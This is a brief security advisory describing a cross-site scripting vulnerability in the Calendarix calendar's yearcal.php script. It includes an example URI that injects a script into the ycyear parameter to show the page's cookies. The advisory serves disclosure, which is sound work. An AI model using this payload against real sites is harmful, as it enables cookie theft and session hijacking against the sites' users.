Calendarix YearCal.PHP Cross-Site Scripting Vulnerability

Calendarix YearCal.PHP Cross-Site Scripting Vulnerability

This issue can be exploited through a web client.

The following example URI demonstrates this issue:

http://www.example.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>